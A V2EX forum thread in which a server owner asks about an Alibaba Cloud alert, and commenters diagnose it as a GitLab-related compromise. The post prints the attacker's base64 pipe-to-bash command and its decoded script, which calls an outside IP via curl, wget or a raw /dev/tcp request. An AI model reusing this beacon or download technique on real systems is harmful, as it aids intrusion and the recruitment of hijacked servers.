收到条阿里云的告警，看不懂是做什么用的，请教一下

2021-10-29 09:43:01 +08:00

ipeony

告警信息

进程异常行为-可疑编码命令待处理
备注
该告警由如下引擎检测发现：
用户名: chrony
命令行: sh -c echo IyEvYmluL2Jhc2gKZnVuY3Rpb24gX19jdXJsKCkgewogIHJlYWQgcHJvdG8gc2VydmVyIHBhdGggPDw8JChlY2hvICR7MS8vLy8gfSkKICBET0M9LyR7cGF0aC8vIC8vfQogIEhPU1Q9JHtzZXJ2ZXIvLzoqfQogIFBPUlQ9JHtzZXJ2ZXIvLyo6fQogIFtbIHgiJHtIT1NUfSIgPT0geCIke1BPUlR9IiBdXSAmJiBQT1JUPTgwCgogIGV4ZWMgMzw+L2Rldi90Y3AvJHtIT1NUfS8kUE9SVAogIGVjaG8gLWVuICJHRVQgJHtET0N9IEhUVFAvMS4wXHJcbkhvc3Q6ICR7SE9TVH1cclxuXHJcbiIgPiYzCiAgKHdoaWxlIHJlYWQgbGluZTsgZG8KICAgW1sgIiRsaW5lIiA9PSAkJ1xyJyBdXSAmJiBicmVhawogIGRvbmUgJiYgY2F0KSA8JjMKICBleGVjIDM+Ji0KfQoKaWYgWyAteCAiJChjb21tYW5kIC12IGN1cmwpIiBdOyB0aGVuCiAgY3VybCAtbyAvZGV2L251bGwgMjEyLjE0Ny4zMi4zNS9nY2FlLzEwMS4zNy43OC4xMDgKZWxpZiBbIC14ICIkKGNvbW1hbmQgLXYgd2dldCkiIF07IHRoZW4KICB3Z2V0IC1xIC1PLSAyMTIuMTQ3LjMyLjM1L2djYWUvMTAxLjM3Ljc4LjEwOAplbHNlCiAgX19jdXJsIGh0dHA6Ly8yMTIuMTQ3LjMyLjM1L2djYWUvMTAxLjM3Ljc4LjEwOCA+L2Rldi9udWxsCmZpCgo= | base64 -d | bash
进程路径: /bin/dash
进程 ID: 26803
父进程文件路径: /usr/bin/perl
父进程 ID: 26798
事件说明: 检测模型发现您的服务器上执行的进程命令行高度可疑，很有可能与木马、病毒、黑客行为有关。

解密后的脚本

#!/bin/bash
function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

if [ -x "$(command -v curl)" ]; then
  curl -o /dev/null 212.147.32.35/gcae/101.37.78.108
elif [ -x "$(command -v wget)" ]; then
  wget -q -O- 212.147.32.35/gcae/101.37.78.108
else
  __curl http://212.147.32.35/gcae/101.37.78.108 >/dev/null
fi

9987 次点击

所在节点

51 条回复

janxin

2021-10-29 09:44:27 +08:00

明显被黑了...

ipeony

2021-10-29 09:46:31 +08:00

@janxin #1 服务器到是没啥，没明白这进程再做什么，开个 shell 后面连过来

bfdh

2021-10-29 09:52:22 +08:00

就发了一个 http 请求，其他啥都没干？

ipeony

2021-10-29 09:56:23 +08:00

@bfdh #3 没找到其他的，服务器上就跑着几个 docker 应用，这是阿里云报的，这台机器连个公网 IP 都没分配

number

2021-10-29 10:13:57 +08:00

学到了在没有 curl 和 wget 的情况下
还可以用这种方式下载文件

makia98

2021-10-29 10:15:01 +08:00

检查一下 docker 镜像有没有问题，我有过服务器被一个 redis 镜像当肉鸡的经历

ipeony

2021-10-29 10:38:42 +08:00

@makia98 #6 嗯，redis 这个以前见过。这台机器主要跑 gitlab ，拿官方镜像跑的，快两年没动过了

lqc09

2021-10-29 10:58:55 +08:00

你已经被干了，一般是要下载 shell 上线脚本统一管理像你这种的肉鸡

lqc09

2021-10-29 11:00:03 +08:00

gitlab 最近刚好报了一个漏洞

holinhot

2021-10-29 12:34:42 +08:00

@bfdh 估计是当肉鸡 CC 别人

holinhot

2021-10-29 12:36:55 +08:00

还能 dev/tcp/ 这么玩，学到了

illl

2021-10-29 13:14:25 +08:00

@ipeony gitlab 存在 rce 漏洞，赶紧修了吧

GrayXu

2021-10-29 13:17:14 +08:00

/dev/tcp/的一万种用法之……

mingl0280

2021-10-29 13:26:44 +08:00

/dev/tcp 还能这么用

ipeony

2021-10-29 13:32:20 +08:00

@illl #12 嗯，已经升级过了，本来就用 docker 跑的

cweijan

2021-10-29 14:18:20 +08:00

这个脚本很酷啊

jptx

2021-10-29 14:20:57 +08:00

学到了，手动建立 TCP 连接，拼接 HTTP 请求头，下载文件，赶紧记笔记。我最近每次碰到各种奇技淫巧都是从各种木马里学到的

vinle

2021-10-29 14:22:38 +08:00

我感觉楼主可以忽略这个东西，让入侵者继续操作，因为从脚本来，看他的操作确实有点骚有点秀了，让他玩下去说不定会有更有趣的事情发生！

a22271001

2021-10-29 14:25:44 +08:00

@vinle 然后楼主的数据库空了，只留下一段加密钱包地址(doge

villivateur

2021-10-29 14:32:45 +08:00

感觉好多系统没有 /dev/tcp 这个设备

第 1 页／共 3 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/811424

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX